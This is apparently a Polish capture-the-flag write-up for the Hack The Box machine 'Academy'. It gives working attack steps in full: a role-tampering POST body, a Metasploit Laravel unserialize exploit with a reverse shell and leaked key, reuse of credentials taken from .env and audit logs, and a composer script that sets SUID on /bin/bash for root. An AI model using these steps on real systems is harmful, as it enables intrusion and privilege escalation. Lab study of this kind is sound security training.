Academy

Nmap

                                                                                                                                                                                        
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

User

Rejestrując użytkownika musimy przechwycić ruch i zmienić ciało zapytania POST “roleid” z 0 na 1

uid=test&password=test&confirm=test&roleid=1

Na utworzonym koncie logujemy się na http://academy.htb/admin.php

Następnie trzeba dodać wpis dev-staging-01.academy.htb do /etc/hosts
Widać dane do shella na stronie

Z tymi danymi używamy metasploita i dostajemy Shell’a

use unix/http/laravel_token_unserialize_exec
set APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set RHOSTS     10.10.10.215
set RPORT      80
set SSL        false
set TARGETURI  /
set VHOST      dev-staging-01.academy.htb
set LHOST      tun0
run

w pliku /var/www/html/academy/.env mamy dane do logowania na użytkownika cry0l1t3

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
cry0l1t3 : mySup3rP4s5w0rd!!

ssh cry0l1t3@10.10.10.215

python3 -c 'import pty;pty.spawn("/bin/bash");'

mamy usera

cat user.txt
d72c36088b27***831e4f6203ae02c

Root

Widzimy, że user jest w grupie adm więc dobrym tropem jest przejrzenie logów.
I znajdujemy hasło na użytkownika mrb3n w /var/log/audit/audit.log

DRUGI SPOSÓB
Można bezpośrednio użyć auditd do odczytania logów – pomijamy problem z hasłem w postaci HEX

type=TTY msg=audit(1597199290.086:83): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A

Hasło okazuje się w HEX’ach trzeba je zdekodować

mrb3n : mrb3n_Ac@d3my!

su mrb3n

Sprawdzamy uprawnienia sudo

mrb3n@academy:~$ sudo -l
[sudo] password for mrb3n: 

Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Mamy instrukcję na internecie co można zrobić z tym composerem

dokumentacja

Sprowadza się to do stworzenia pliku JSON i uruchomienie go z SUDO

{
    "scripts": {
        "test": [
            "@clearCache",
            "phpunit"
        ],
        "clearCache": "chmod u+s /bin/bash"
    }
}
sudo /usr/bin/composer clearCache

/bin/bash -p
bash-5.0# cat root.txt
0f41ca36f***37156befd5c09ba287

Leave a Comment